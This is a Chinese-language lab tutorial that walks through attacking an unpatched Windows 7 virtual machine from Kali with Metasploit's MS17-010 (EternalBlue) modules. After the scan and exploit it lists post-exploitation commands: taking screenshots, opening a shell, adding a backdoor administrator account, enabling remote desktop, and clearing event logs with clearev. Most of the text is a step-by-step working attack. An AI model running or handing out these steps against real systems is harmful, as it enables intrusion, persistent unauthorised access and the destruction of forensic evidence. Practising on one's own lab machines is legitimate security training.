目录

准备靶机

测试ping连通性

攻击漏洞

利用漏洞

---

准备靶机

1台kali，1台win7

win7系统可以在MSDN镜像网站里获取

注:将win7安装好，win7无法安装vmtools，若升级系统，可能会把永恒之蓝补丁打上，所以建议别升级系统

测试ping连通性

win7的IP地址为192.168.164.129

 kali的IP地址为192.168.164.130

将这两台机器互ping发现可以ping通

攻击漏洞

在kali系统里打开msf,每次打开msf的界面都不一样

msfconsole

 搜索ms17_010

search ms17_010

 其中0模块是漏洞攻击模块，对存在永恒之蓝漏洞的目标进行攻击，3模块为扫描漏洞模块，对目标是否存在永恒之蓝漏洞进行扫描

首先使用3模块扫描目标是否存在永恒之蓝漏洞

 输入optinos可以查看获得相关信息帮助

 设置目标主机rhosts

set RHOSTS 192.168.164.129

 设置好后直接run即可

 如图所示，信息提示说192.168.164.129存在ms17-010漏洞

在确定好存在漏洞后，可以返回使用0模块进行漏洞攻击

 设置RHOSTS

 进行攻击使用exploit

 如果出现了meterpreter  代表攻击成功

利用漏洞

可以使用sysinfo显示远程主机信息

 对远程主机进行截图操作

screenshot

获得shell控制台：shell

输入chcp 65001即可消除乱码

添加用户

net user test 123456 /add
net localgroup administrators test /add

 启用远程桌面

run post/windows/manage/enable_rdp

使用rdesktop进行远程登录

rdesktop 192.168.164.129

 输入刚刚添加的用户

 远程登录成功

清除日志

clearev